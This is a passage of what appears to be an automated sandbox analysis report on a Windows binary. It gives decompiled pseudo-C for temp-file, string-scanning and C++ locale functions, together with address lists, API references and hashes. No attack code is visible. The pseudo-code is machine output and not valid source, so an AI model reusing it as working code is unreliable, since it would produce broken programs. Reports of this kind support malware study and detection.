                                                                                                										L57:
                                                                                                										_t189 = _t188 | 0xffffffff;
                                                                                                										__eflags = _t188 | 0xffffffff;
                                                                                                									} else {
                                                                                                										_t244 = _t255 + _t266 * 2;
                                                                                                										_t188 = _t255;
                                                                                                										__eflags = _t255 - _t244;
                                                                                                										if(_t255 >= _t244) {
                                                                                                											goto L57;
                                                                                                										} else {
                                                                                                											while(1) {
                                                                                                												__eflags =  *_t188 - 0x5c;
                                                                                                												if( *_t188 != 0x5c) {
                                                                                                													break;
                                                                                                												}
                                                                                                												_t188 = _t188 + 2;
                                                                                                												__eflags = _t188 - _t244;
                                                                                                												if(_t188 < _t244) {
                                                                                                													continue;
                                                                                                												} else {
                                                                                                													goto L57;
                                                                                                												}
                                                                                                												goto L58;
                                                                                                											}
                                                                                                											_t189 = _t188 - _t255 >> 1;
                                                                                                										}
                                                                                                									}
                                                                                                									L58:
                                                                                                									_t242 = _t276;
                                                                                                									__eflags = _t282 - 8;
                                                                                                									if(_t282 >= 8) {
                                                                                                										_t242 =  *_t276;
                                                                                                									}
                                                                                                									_t183 = E00F73560(_t210, _t276, _t266, _t282,  &_v644, _t210, _t242 + _t189 * 2);
                                                                                                								} else {
                                                                                                									_t212 = _t276;
                                                                                                									__eflags = _t240 - 8;
                                                                                                									if(_t240 >= 8) {
                                                                                                										_t212 =  *_t276;
                                                                                                									}
                                                                                                									_t256 = _t252 | 0xffffffff;
                                                                                                									_t245 = _t266 - 1;
                                                                                                									__eflags = _t245 - _t256;
                                                                                                									_t257 =  <  ? _t245 : _t256;
                                                                                                									__eflags =  *(_t212 + _t257 * 2) - 0x5c;
                                                                                                									_t258 = _t212 + _t257 * 2;
                                                                                                									if( *(_t212 + _t257 * 2) != 0x5c) {
                                                                                                										L42:
                                                                                                										_t259 = _t258 - _t212;
                                                                                                										__eflags = _t259;
                                                                                                										_t260 = _t259 >> 1;
                                                                                                									} else {
                                                                                                										while(1) {
                                                                                                											__eflags = _t258 - _t212;
                                                                                                											if(_t258 == _t212) {
                                                                                                												break;
                                                                                                											}
                                                                                                											_t258 = _t258 - 2;
                                                                                                											__eflags =  *_t258 - 0x5c;
                                                                                                											if( *_t258 == 0x5c) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                												goto L42;
                                                                                                											}
                                                                                                											goto L43;
                                                                                                										}
                                                                                                										_t260 = _t258 | 0xffffffff;
                                                                                                									}
                                                                                                									L43:
                                                                                                									__eflags = _t260 - 0xffffffff;
                                                                                                									_t247 =  !=  ? 2 + _t260 * 2 + _t281 : _t281;
                                                                                                									_t183 = E00F73560(_t212, _t276, _t266, _t281,  &_v644,  !=  ? 2 + _t260 * 2 + _t281 : _t281, _t185);
                                                                                                									_t266 =  *(_t276 + 0x10);
                                                                                                									__eflags = _t266;
                                                                                                									if(_t266 != 0) {
                                                                                                										goto L44;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							return _t183;
                                                                                                						} else {
                                                                                                							_t197 = _t182 - _t275;
                                                                                                							__eflags = _t197 - 1;
                                                                                                							_t262 =  <  ? _t197 : 1;
                                                                                                							__eflags = _t222 - 8;
                                                                                                							_t199 =  >=  ? _v588 :  &_v588;
                                                                                                							_t249 = ( >=  ? _v588 :  &_v588) + _t275 * 2;
                                                                                                							_t201 = _v616 - 1;
                                                                                                							_v572 = _t201;
                                                                                                							__eflags = _t201 - _t275;
                                                                                                							E00F95C10(( >=  ? _v588 :  &_v588) + _t275 * 2, ( >=  ? _v588 :  &_v588) + _t275 * 2 + ( <  ? _t197 : 1) * 2, 2 + (_t201 - _t275) * 2);
                                                                                                							_t285 = _t285 + 0xc;
                                                                                                							goto L9;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					asm("xorps xmm0, xmm0");
                                                                                                					asm("movups [edi], xmm0");
                                                                                                					asm("movq [edi+0x10], xmm0");
                                                                                                					_t264[4] = _t140;
                                                                                                					_t264[5] = 7;
                                                                                                					 *_t264 = _t140;
                                                                                                					_v8 = _t140;
                                                                                                					_v620 = 1;
                                                                                                					L28:
                                                                                                					 *[fs:0x0] = _v16;
                                                                                                					return E00F80D7F(_v20 ^ _t279, _t250);
                                                                                                				}
                                                                                                				L64:
                                                                                                			}










































































                                                                                                0x00f72ff0
                                                                                                0x00f72ff0
                                                                                                0x00f72ff1
                                                                                                0x00f72ff3
                                                                                                0x00f72ff5
                                                                                                0x00f73000
                                                                                                0x00f73001
                                                                                                0x00f73007
                                                                                                0x00f7300c
                                                                                                0x00f7300e
                                                                                                0x00f73011
                                                                                                0x00f73013
                                                                                                0x00f73017
                                                                                                0x00f7301d
                                                                                                0x00f73023
                                                                                                0x00f73025
                                                                                                0x00f7302b
                                                                                                0x00f73031
                                                                                                0x00f73033
                                                                                                0x00f73041
                                                                                                0x00f73043
                                                                                                0x00f73043
                                                                                                0x00f73054
                                                                                                0x00f7305c
                                                                                                0x00f73088
                                                                                                0x00f7308e
                                                                                                0x00f73091
                                                                                                0x00f73091
                                                                                                0x00f73094
                                                                                                0x00f73097
                                                                                                0x00f73097
                                                                                                0x00f7309e
                                                                                                0x00f730ac
                                                                                                0x00f730ba
                                                                                                0x00f730cb
                                                                                                0x00f730d5
                                                                                                0x00f730df
                                                                                                0x00f730e4
                                                                                                0x00f730f8
                                                                                                0x00f730fd
                                                                                                0x00f73107
                                                                                                0x00f73110
                                                                                                0x00f7311a
                                                                                                0x00f7312f
                                                                                                0x00f73139
                                                                                                0x00f73143
                                                                                                0x00f7314a
                                                                                                0x00f7314f
                                                                                                0x00f73159
                                                                                                0x00f7315f
                                                                                                0x00f73162
                                                                                                0x00f73168
                                                                                                0x00f7316b
                                                                                                0x00f7316f
                                                                                                0x00f731e2
                                                                                                0x00f731e2
                                                                                                0x00f731e8
                                                                                                0x00f731ea
                                                                                                0x00f731f0
                                                                                                0x00f731f6
                                                                                                0x00f731fc
                                                                                                0x00f731fe
                                                                                                0x00f73264
                                                                                                0x00f73264
                                                                                                0x00f73267
                                                                                                0x00000000
                                                                                                0x00f73269
                                                                                                0x00f73272
                                                                                                0x00f73277
                                                                                                0x00f7327d
                                                                                                0x00f73283
                                                                                                0x00000000
                                                                                                0x00f73283
                                                                                                0x00000000
                                                                                                0x00f73200
                                                                                                0x00f73200
                                                                                                0x00f73201
                                                                                                0x00f73204
                                                                                                0x00f7328b
                                                                                                0x00f7320a
                                                                                                0x00f7320a
                                                                                                0x00f73210
                                                                                                0x00f73210
                                                                                                0x00f73219
                                                                                                0x00f7321c
                                                                                                0x00f73221
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f73223
                                                                                                0x00f7322c
                                                                                                0x00f7322f
                                                                                                0x00f73234
                                                                                                0x00000000
                                                                                                0x00f73236
                                                                                                0x00f73236
                                                                                                0x00f73237
                                                                                                0x00f7323a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7323a
                                                                                                0x00000000
                                                                                                0x00f73234
                                                                                                0x00f7323c
                                                                                                0x00f7323c
                                                                                                0x00f7323c
                                                                                                0x00f73204
                                                                                                0x00f73242
                                                                                                0x00f73242
                                                                                                0x00f73244
                                                                                                0x00f7328f
                                                                                                0x00f73291
                                                                                                0x00f73298
                                                                                                0x00f7329e
                                                                                                0x00f732a5
                                                                                                0x00f73246
                                                                                                0x00f73249
                                                                                                0x00f7324c
                                                                                                0x00f73258
                                                                                                0x00f7325b
                                                                                                0x00f7325b
                                                                                                0x00f732b7
                                                                                                0x00f732c9
                                                                                                0x00f732ce
                                                                                                0x00f732d2
                                                                                                0x00f732d6
                                                                                                0x00f732d8
                                                                                                0x00f732d8
                                                                                                0x00f732e8
                                                                                                0x00f732ea
                                                                                                0x00f732f4
                                                                                                0x00f732f9
                                                                                                0x00f732fb
                                                                                                0x00f73394
                                                                                                0x00f7339b
                                                                                                0x00f733a2
                                                                                                0x00f733a4
                                                                                                0x00f733ab
                                                                                                0x00f733ae
                                                                                                0x00f733b5
                                                                                                0x00f733bd
                                                                                                0x00f733c2
                                                                                                0x00f733cc
                                                                                                0x00f733d6
                                                                                                0x00f733da
                                                                                                0x00f733e4
                                                                                                0x00f733ee
                                                                                                0x00f73301
                                                                                                0x00f73301
                                                                                                0x00f7330d
                                                                                                0x00f73312
                                                                                                0x00f73317
                                                                                                0x00f7331f
                                                                                                0x00f7332a
                                                                                                0x00f73330
                                                                                                0x00f73337
                                                                                                0x00f7333c
                                                                                                0x00f7333f
                                                                                                0x00f73342
                                                                                                0x00f73349
                                                                                                0x00f73351
                                                                                                0x00f73356
                                                                                                0x00f7335c
                                                                                                0x00f73366
                                                                                                0x00f7336a
                                                                                                0x00f73374
                                                                                                0x00f7337e
                                                                                                0x00f73383
                                                                                                0x00f7338d
                                                                                                0x00f7338d
                                                                                                0x00f733f3
                                                                                                0x00f73400
                                                                                                0x00000000
                                                                                                0x00f73171
                                                                                                0x00f73171
                                                                                                0x00f73180
                                                                                                0x00f73183
                                                                                                0x00f73186
                                                                                                0x00f73188
                                                                                                0x00f7318e
                                                                                                0x00f73190
                                                                                                0x00f73196
                                                                                                0x00f73198
                                                                                                0x00f73422
                                                                                                0x00f73427
                                                                                                0x00f73428
                                                                                                0x00f73429
                                                                                                0x00f7342a
                                                                                                0x00f7342b
                                                                                                0x00f7342c
                                                                                                0x00f7342d
                                                                                                0x00f7342e
                                                                                                0x00f7342f
                                                                                                0x00f73430
                                                                                                0x00f73431
                                                                                                0x00f73432
                                                                                                0x00f73434
                                                                                                0x00f73435
                                                                                                0x00f73438
                                                                                                0x00f7343a
                                                                                                0x00f73440
                                                                                                0x00f73443
                                                                                                0x00f73444
                                                                                                0x00f73446
                                                                                                0x00f73449
                                                                                                0x00f7344b
                                                                                                0x00f7344b
                                                                                                0x00f7344d
                                                                                                0x00f7344f
                                                                                                0x00f73451
                                                                                                0x00f73451
                                                                                                0x00f73453
                                                                                                0x00f73459
                                                                                                0x00f7345c
                                                                                                0x00f7345d
                                                                                                0x00f734bb
                                                                                                0x00f734c0
                                                                                                0x00f734c2
                                                                                                0x00f734c6
                                                                                                0x00f734c9
                                                                                                0x00f734cd
                                                                                                0x00f734cf
                                                                                                0x00f734cf
                                                                                                0x00f734d1
                                                                                                0x00f734d5
                                                                                                0x00f734de
                                                                                                0x00f734e6
                                                                                                0x00f734e8
                                                                                                0x00f734ea
                                                                                                0x00f734ed
                                                                                                0x00f734fe
                                                                                                0x00f73500
                                                                                                0x00f73502
                                                                                                0x00f734ef
                                                                                                0x00f734ef
                                                                                                0x00f734ef
                                                                                                0x00f734ed
                                                                                                0x00f73504
                                                                                                0x00f73509
                                                                                                0x00f7350b
                                                                                                0x00f7350e
                                                                                                0x00f73511
                                                                                                0x00f73514
                                                                                                0x00f73516
                                                                                                0x00f73516
                                                                                                0x00f73518
                                                                                                0x00f7351a
                                                                                                0x00f73532
                                                                                                0x00f73532
                                                                                                0x00f73532
                                                                                                0x00f7351c
                                                                                                0x00f7351c
                                                                                                0x00f7351f
                                                                                                0x00f73521
                                                                                                0x00f73523
                                                                                                0x00000000
                                                                                                0x00f73525
                                                                                                0x00f73525
                                                                                                0x00f73525
                                                                                                0x00f73529
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7352b
                                                                                                0x00f7352e
                                                                                                0x00f73530
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f73530
                                                                                                0x00f73557
                                                                                                0x00f73557
                                                                                                0x00f73523
                                                                                                0x00f73535
                                                                                                0x00f73535
                                                                                                0x00f73537
                                                                                                0x00f7353a
                                                                                                0x00f7353c
                                                                                                0x00f7353c
                                                                                                0x00f7354a
                                                                                                0x00f7345f
                                                                                                0x00f7345f
                                                                                                0x00f73461
                                                                                                0x00f73464
                                                                                                0x00f73466
                                                                                                0x00f73466
                                                                                                0x00f73468
                                                                                                0x00f7346b
                                                                                                0x00f7346e
                                                                                                0x00f73470
                                                                                                0x00f73473
                                                                                                0x00f73478
                                                                                                0x00f7347b
                                                                                                0x00f7348d
                                                                                                0x00f7348d
                                                                                                0x00f7348d
                                                                                                0x00f7348f
                                                                                                0x00f73480
                                                                                                0x00f73480
                                                                                                0x00f73480
                                                                                                0x00f73482
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f73484
                                                                                                0x00f73487
                                                                                                0x00f7348b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7348b
                                                                                                0x00f734f4
                                                                                                0x00f734f4
                                                                                                0x00f73491
                                                                                                0x00f7349d
                                                                                                0x00f734a0
                                                                                                0x00f734ab
                                                                                                0x00f734b0
                                                                                                0x00f734b3
                                                                                                0x00f734b5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f734b5
                                                                                                0x00f73550
                                                                                                0x00f73554
                                                                                                0x00f7319e
                                                                                                0x00f7319e
                                                                                                0x00f731a5
                                                                                                0x00f731a7
                                                                                                0x00f731aa
                                                                                                0x00f731b3
                                                                                                0x00f731ba
                                                                                                0x00f731c3
                                                                                                0x00f731c5
                                                                                                0x00f731cb
                                                                                                0x00f731da
                                                                                                0x00f731df
                                                                                                0x00000000
                                                                                                0x00f731df
                                                                                                0x00f73198
                                                                                                0x00f7305e
                                                                                                0x00f7305e
                                                                                                0x00f73061
                                                                                                0x00f73064
                                                                                                0x00f73069
                                                                                                0x00f7306c
                                                                                                0x00f73073
                                                                                                0x00f73076
                                                                                                0x00f73079
                                                                                                0x00f73405
                                                                                                0x00f7340a
                                                                                                0x00f73421
                                                                                                0x00f73421
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetTempFileNameW.KERNEL32(?,URL,00000000,?,FD8FA683), ref: 00F73054
                                                                                                • MoveFileW.KERNEL32(?,00000000), ref: 00F732E2
                                                                                                • DeleteFileW.KERNEL32(?), ref: 00F7332A
                                                                                                  • Part of subcall function 00F72D10: LocalFree.KERNEL32(?,FD8FA683,?,?,00FB53A0,000000FF,?,00F71152,FD8FA683,?,?,00FB5350,000000FF), ref: 00F72D61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: File$DeleteFreeLocalMoveNameTemp
                                                                                                • String ID: URL$url
                                                                                                • API String ID: 1622375482-346267919
                                                                                                • Opcode ID: 67184c455909867b4faa2480f03005b22131f007be38d05ad7463eece92d4a82
                                                                                                • Instruction ID: e9a3bcf79d1dc5eb8aaaf781b6779b0a9134de1f8db76dc8a87e340e5d4e7c5e
                                                                                                • Opcode Fuzzy Hash: 67184c455909867b4faa2480f03005b22131f007be38d05ad7463eece92d4a82
                                                                                                • Instruction Fuzzy Hash: E1C14930D142699ACB64DF24CC98BDDB7B4BF54304F1082DAD409A7291EB796B88EF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00F7B850(void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                				intOrPtr _v8;
                                                                                                				signed short _v16;
                                                                                                				char _v24;
                                                                                                				signed int _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				char _v76;
                                                                                                				char _v120;
                                                                                                				char _v124;
                                                                                                				char _v128;
                                                                                                				signed short _v132;
                                                                                                				signed int _v136;
                                                                                                				signed short _v140;
                                                                                                				signed short _v144;
                                                                                                				signed short _v148;
                                                                                                				char _v156;
                                                                                                				char _v164;
                                                                                                				char _v216;
                                                                                                				char _v268;
                                                                                                				char _v316;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				signed int _t64;
                                                                                                				signed int _t65;
                                                                                                				signed int _t72;
                                                                                                				intOrPtr _t75;
                                                                                                				void* _t80;
                                                                                                				void* _t102;
                                                                                                				intOrPtr _t109;
                                                                                                				void* _t111;
                                                                                                				signed short* _t113;
                                                                                                				signed short _t117;
                                                                                                				void* _t122;
                                                                                                				void* _t144;
                                                                                                
                                                                                                				_t144 = __fp0;
                                                                                                				_t111 = __edx;
                                                                                                				_t102 = _t122;
                                                                                                				_v8 =  *((intOrPtr*)(_t102 + 4));
                                                                                                				_t120 = (_t122 - 0x00000008 & 0xfffffff8) + 4;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb69ff);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_push(_t102);
                                                                                                				_t64 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t65 = _t64 ^ (_t122 - 0x00000008 & 0xfffffff8) + 0x00000004;
                                                                                                				_v32 = _t65;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_push(_t65);
                                                                                                				 *[fs:0x0] =  &_v24;
                                                                                                				_t113 =  *(_t102 + 8);
                                                                                                				_v132 =  *(_t102 + 0xc);
                                                                                                				_v136 = 0;
                                                                                                				if(_t113 != 0 &&  *_t113 == 0) {
                                                                                                					_t117 = LocalAlloc(0x40, 0x18);
                                                                                                					_v148 = _t117;
                                                                                                					_v16 = 0;
                                                                                                					if(_t117 == 0) {
                                                                                                						_t117 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_t109 =  *((intOrPtr*)(_v132 + 4));
                                                                                                						if(_t109 == 0) {
                                                                                                							_t75 = 0xfc76d9;
                                                                                                						} else {
                                                                                                							_t75 =  *((intOrPtr*)(_t109 + 0x18));
                                                                                                							_t140 = _t75;
                                                                                                							if(_t75 == 0) {
                                                                                                								_t75 = _t109 + 0x1c;
                                                                                                							}
                                                                                                						}
                                                                                                						E00F78E20( &_v216, _t117, _t75);
                                                                                                						_v16 = 1;
                                                                                                						_v136 = 1;
                                                                                                						 *_t117 = 0xfb83d0;
                                                                                                						_v16 = 2;
                                                                                                						 *_t117 = 0xfb83e0;
                                                                                                						 *(_t117 + 4) = 0;
                                                                                                						_v16 = 3;
                                                                                                						 *_t117 = 0xfb94ec;
                                                                                                						E00FA1EE6(_t111);
                                                                                                						_t80 = E00F85A28(_t140,  &_v268);
                                                                                                						_v144 = _t117;
                                                                                                						asm("movups xmm0, [eax]");
                                                                                                						asm("movups [ebp-0x40], xmm0");
                                                                                                						asm("movups xmm0, [eax+0x10]");
                                                                                                						asm("movups [ebp-0x30], xmm0");
                                                                                                						asm("movq xmm0, [eax+0x20]");
                                                                                                						asm("movq [ebp-0x20], xmm0");
                                                                                                						_v36 =  *((intOrPtr*)(_t80 + 0x28));
                                                                                                						 *(_t117 + 8) = 0;
                                                                                                						 *(_t117 + 0x10) = 0;
                                                                                                						 *(_t117 + 0x14) = 0;
                                                                                                						_v16 = 4;
                                                                                                						E00F85A28(_t140,  &_v316);
                                                                                                						_push( &_v120);
                                                                                                						_push(0);
                                                                                                						 *(_t117 + 8) = E00F7F7A0(0xfc76d9);
                                                                                                						 *(_t117 + 0x10) = E00F7FE50(_t102, _t113, _t117, _t144, "false", 0,  &_v76);
                                                                                                						 *(_t117 + 0x14) = E00F7FE50(_t102, _t113, _t117, _t144, "true", 0,  &_v76);
                                                                                                						_v144 = 0;
                                                                                                						asm("xorps xmm0, xmm0");
                                                                                                						_v124 = 0x2e;
                                                                                                						_v140 = 0;
                                                                                                						asm("movlpd [ebp-0x90], xmm0");
                                                                                                						E00F85AF7( &_v216,  &_v140,  &_v124, 1,  &_v156,  &_v76);
                                                                                                						asm("xorps xmm0, xmm0");
                                                                                                						 *((short*)(_t117 + 0xc)) = _v140 & 0x0000ffff;
                                                                                                						_v128 = 0x2c;
                                                                                                						_v132 = 0;
                                                                                                						asm("movlpd [ebp-0x98], xmm0");
                                                                                                						E00F85AF7( &_v216,  &_v132,  &_v128, 1,  &_v164,  &_v76);
                                                                                                						 *((short*)(_t117 + 0xe)) = _v132 & 0x0000ffff;
                                                                                                						_v16 = 1;
                                                                                                					}
                                                                                                					_v16 = 5;
                                                                                                					 *_t113 = _t117;
                                                                                                					_v16 = 0xffffffff;
                                                                                                					_t72 = _v136;
                                                                                                					if((_t72 & 0x00000001) != 0) {
                                                                                                						_v136 = _t72 & 0xfffffffe;
                                                                                                						E00F79300();
                                                                                                					}
                                                                                                				}
                                                                                                				 *[fs:0x0] = _v24;
                                                                                                				return E00F80D7F(_v32 ^ _t120, _t111);
                                                                                                			}




































                                                                                                0x00f7b850
                                                                                                0x00f7b850
                                                                                                0x00f7b851
                                                                                                0x00f7b860
                                                                                                0x00f7b864
                                                                                                0x00f7b866
                                                                                                0x00f7b868
                                                                                                0x00f7b873
                                                                                                0x00f7b874
                                                                                                0x00f7b87b
                                                                                                0x00f7b880
                                                                                                0x00f7b882
                                                                                                0x00f7b885
                                                                                                0x00f7b886
                                                                                                0x00f7b887
                                                                                                0x00f7b88b
                                                                                                0x00f7b894
                                                                                                0x00f7b897
                                                                                                0x00f7b89c
                                                                                                0x00f7b8a1
                                                                                                0x00f7b8b9
                                                                                                0x00f7b8bb
                                                                                                0x00f7b8c1
                                                                                                0x00f7b8ca
                                                                                                0x00f7ba53
                                                                                                0x00f7ba53
                                                                                                0x00f7b8d0
                                                                                                0x00f7b8d3
                                                                                                0x00f7b8d8
                                                                                                0x00f7b8e6
                                                                                                0x00f7b8da
                                                                                                0x00f7b8da
                                                                                                0x00f7b8dd
                                                                                                0x00f7b8df
                                                                                                0x00f7b8e1
                                                                                                0x00f7b8e1
                                                                                                0x00f7b8df
                                                                                                0x00f7b8f2
                                                                                                0x00f7b8f7
                                                                                                0x00f7b900
                                                                                                0x00f7b903
                                                                                                0x00f7b909
                                                                                                0x00f7b910
                                                                                                0x00f7b916
                                                                                                0x00f7b91d
                                                                                                0x00f7b924
                                                                                                0x00f7b92a
                                                                                                0x00f7b936
                                                                                                0x00f7b93e
                                                                                                0x00f7b944
                                                                                                0x00f7b947
                                                                                                0x00f7b94b
                                                                                                0x00f7b94f
                                                                                                0x00f7b953
                                                                                                0x00f7b958
                                                                                                0x00f7b960
                                                                                                0x00f7b963
                                                                                                0x00f7b96a
                                                                                                0x00f7b971
                                                                                                0x00f7b978
                                                                                                0x00f7b983
                                                                                                0x00f7b98e
                                                                                                0x00f7b98f
                                                                                                0x00f7b99e
                                                                                                0x00f7b9b4
                                                                                                0x00f7b9ca
                                                                                                0x00f7b9d0
                                                                                                0x00f7b9da
                                                                                                0x00f7b9dd
                                                                                                0x00f7b9e1
                                                                                                0x00f7b9ef
                                                                                                0x00f7ba02
                                                                                                0x00f7ba0b
                                                                                                0x00f7ba11
                                                                                                0x00f7ba15
                                                                                                0x00f7ba19
                                                                                                0x00f7ba20
                                                                                                0x00f7ba3d
                                                                                                0x00f7ba49
                                                                                                0x00f7ba4d
                                                                                                0x00f7ba4d
                                                                                                0x00f7ba55
                                                                                                0x00f7ba5c
                                                                                                0x00f7ba5e
                                                                                                0x00f7ba65
                                                                                                0x00f7ba6a
                                                                                                0x00f7ba75
                                                                                                0x00f7ba78
                                                                                                0x00f7ba78
                                                                                                0x00f7ba6a
                                                                                                0x00f7ba85
                                                                                                0x00f7ba9f

                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,00000018,FD8FA683,?,00000000), ref: 00F7B8B3
                                                                                                • __Getcvt.LIBCPMT ref: 00F7B936
                                                                                                • __Getcvt.LIBCPMT ref: 00F7B983
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Getcvt$AllocLocal
                                                                                                • String ID: false$true
                                                                                                • API String ID: 3009934074-2658103896
                                                                                                • Opcode ID: 76c3453c744ad325514b394ba66cbcf1bd1e04ddc56469e31a65f28307dcd07d
                                                                                                • Instruction ID: 0066aebca29790e1be717742620e7ee3a08b56c9f69eb137bfcb8bbdd0702822
                                                                                                • Opcode Fuzzy Hash: 76c3453c744ad325514b394ba66cbcf1bd1e04ddc56469e31a65f28307dcd07d
                                                                                                • Instruction Fuzzy Hash: 9F6161B1C04718DBDB20DFA4CD41BDEB7B8BF14704F14826AE859A7282E7749A44DF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F794F0(void* __ebx, long __ecx, void* __eflags, void* _a4) {
                                                                                                				void* _v8;
                                                                                                				char _v16;
                                                                                                				char _v17;
                                                                                                				long _v24;
                                                                                                				void* _v28;
                                                                                                				char _v32;
                                                                                                				signed int _v36;
                                                                                                				char _v40;
                                                                                                				signed int _v44;
                                                                                                				short _v48;
                                                                                                				signed int _v52;
                                                                                                				short _v56;
                                                                                                				void* _v60;
                                                                                                				char _v64;
                                                                                                				void* _v68;
                                                                                                				char _v72;
                                                                                                				void* _v76;
                                                                                                				char _v80;
                                                                                                				signed int _v92;
                                                                                                				intOrPtr _v96;
                                                                                                				long _v104;
                                                                                                				intOrPtr* _v108;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t77;
                                                                                                				intOrPtr* _t87;
                                                                                                				void* _t88;
                                                                                                				void* _t92;
                                                                                                				long _t93;
                                                                                                				long _t95;
                                                                                                				void* _t102;
                                                                                                				signed int _t108;
                                                                                                				signed int _t109;
                                                                                                				void* _t113;
                                                                                                				void* _t114;
                                                                                                				void* _t116;
                                                                                                				void* _t118;
                                                                                                				long _t122;
                                                                                                				signed int _t124;
                                                                                                				void* _t126;
                                                                                                				void** _t128;
                                                                                                				void** _t131;
                                                                                                				long _t132;
                                                                                                				void* _t133;
                                                                                                				void* _t136;
                                                                                                				intOrPtr* _t139;
                                                                                                				intOrPtr* _t144;
                                                                                                				void* _t146;
                                                                                                				void* _t147;
                                                                                                				signed int _t148;
                                                                                                				void* _t149;
                                                                                                				void* _t154;
                                                                                                				void _t155;
                                                                                                				void** _t156;
                                                                                                				long _t157;
                                                                                                				void* _t162;
                                                                                                				signed int _t165;
                                                                                                				signed int _t169;
                                                                                                				void* _t171;
                                                                                                				void* _t185;
                                                                                                
                                                                                                				_t165 = _t169;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6558);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_push(_t154);
                                                                                                				_push(_t146);
                                                                                                				_t77 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t77 ^ _t165);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_t122 = __ecx;
                                                                                                				_v24 = __ecx;
                                                                                                				_push(0);
                                                                                                				_v17 = 0;
                                                                                                				E00F854A4(_t146, _t154, __eflags);
                                                                                                				_t171 = _t169 - 0x40 + 4;
                                                                                                				_v28 =  *(_t122 + 4);
                                                                                                				_v8 = 0;
                                                                                                				_t147 = _a4;
                                                                                                				_t155 = _t147;
                                                                                                				if( *((intOrPtr*)(_t147 + 0x14)) >= 0x10) {
                                                                                                					_t155 =  *_t147;
                                                                                                				}
                                                                                                				_t131 =  &_v80;
                                                                                                				E00F856E6(_t131, 0);
                                                                                                				_v8 = 1;
                                                                                                				_v76 = 0;
                                                                                                				_v72 = 0;
                                                                                                				_v8 = 2;
                                                                                                				_v68 = 0;
                                                                                                				_v64 = 0;
                                                                                                				_v8 = 3;
                                                                                                				_v60 = 0;
                                                                                                				_v56 = 0;
                                                                                                				_v8 = 4;
                                                                                                				_v52 = 0;
                                                                                                				_v48 = 0;
                                                                                                				_v8 = 5;
                                                                                                				_v44 = 0;
                                                                                                				_v40 = 0;
                                                                                                				_v8 = 6;
                                                                                                				_v36 = 0;
                                                                                                				_v32 = 0;
                                                                                                				_v8 = 7;
                                                                                                				if(_t155 == 0) {
                                                                                                					L28:
                                                                                                					E00F81E02("bad locale name");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					_push(_t131);
                                                                                                					_push(_t122);
                                                                                                					_push(_t155);
                                                                                                					_t156 = _t131;
                                                                                                					_push(_t147);
                                                                                                					_t148 = _v92;
                                                                                                					_t132 = _t156[5];
                                                                                                					_v104 = _t132;
                                                                                                					__eflags = _t148 - _t132;
                                                                                                					if(_t148 > _t132) {
                                                                                                						__eflags = _t148 - 0x7fffffff;
                                                                                                						if(_t148 > 0x7fffffff) {
                                                                                                							L54:
                                                                                                							E00F71D00(_t122, _t132, _t148, _t156);
                                                                                                							goto L55;
                                                                                                						} else {
                                                                                                							_t124 = _t148 | 0x0000000f;
                                                                                                							__eflags = _t124 - 0x7fffffff;
                                                                                                							if(_t124 <= 0x7fffffff) {
                                                                                                								_t143 = _t132 >> 1;
                                                                                                								__eflags = _t132 - 0x7fffffff - _t143;
                                                                                                								if(_t132 <= 0x7fffffff - _t143) {
                                                                                                									_t92 = _t143 + _t132;
